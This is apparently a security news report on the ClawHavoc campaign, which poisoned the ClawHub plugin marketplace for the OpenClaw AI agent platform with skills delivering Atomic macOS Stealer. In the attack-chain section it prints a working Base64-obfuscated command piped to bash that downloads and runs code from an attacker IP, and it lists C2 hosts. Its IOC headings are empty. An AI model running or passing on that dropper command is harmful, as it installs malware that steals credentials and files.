OpenClaw: New Target in Rising Supply Chain Becomes Wave

The rapidly growing open-source AI agent platform, OpenClaw, is confronting severe supply chain risks. Attackers are actively poisoning its ClawHub plugin marketplace by introducing malicious skills.

Security firms SlowMist and Koi Security have uncovered hundreds of compromised extensions deploying infostealers like Atomic Stealer.

OpenClaw enables local AI agents to automate workflows, interact with services, and control devices through “skills” modular extensions hosted on ClawHub.

Skills follow the AgentSkills spec, primarily as SKILL.md folders containing executable instructions rather than auditable code. This design shifts Markdown from documentation to operational entry points, making it ripe for abuse.

ClawHub’s permissive upload process lacks rigorous reviews, mirroring vulnerabilities in npm or VS Code marketplaces. Popularity surged recently, drawing developers and attackers alike.

Koi Security scanned 2,857 ClawHub skills, identifying 341 malicious ones 12% infection rate in a campaign dubbed ClawHavoc. SlowMist consolidated IOCs from over 400 samples, noting 472 affected skills with shared infrastructure.

Malicious skills cluster around crypto tools (e.g., Solana trackers, Phantom wallets), YouTube utilities, Polymarket bots, and typosquats like “clawhub1.” They masquerade as updaters, security checks, or finance aids to bypass vigilance.

Attack Chain Breakdown

Attackers embed two-stage payloads in SKILL.md “prerequisites.” Users decode Base64-obfuscated commands like echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC83YnV1MjRseThtMXRuOG00KSI=' | base64 -D | bash, triggering curl | bash downloads.

First-stage droppers fetch scripts from IPs like 91.92.242.30, then pull second-stage binaries (e.g., x5ki60w1ih838sp7). These are ad-hoc signed Mach-O universals matching Atomic macOS Stealer (AMOS), which copies Desktop/Documents data, exfiltrates to C2s like socifiapp.com, and steals Keychain/browser creds, according to SlowMist analysis.

Dynamic analysis reveals phishing dialogs for passwords, ZIP archiving of .txt/.pdf files, and uploads via curl. Reuse of domains/IPs (e.g., 91.92.242.30 linked to Poseidon extortion group) indicates organized operations.

A popular “X (Twitter) Trends” skill hides Base64 backdoors mimicking config output. Decoding yields downloads from 91.92.242.30/q0c7ew2ro8l2cfqp, chaining to dyrtvwjfveyxjf23 a stealer targeting macOS folders. This evades keyword scanners while enabling rapid payload swaps.

IOCs

Domain IOCs

URL IOCs

IP IOCs

File IOCs

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.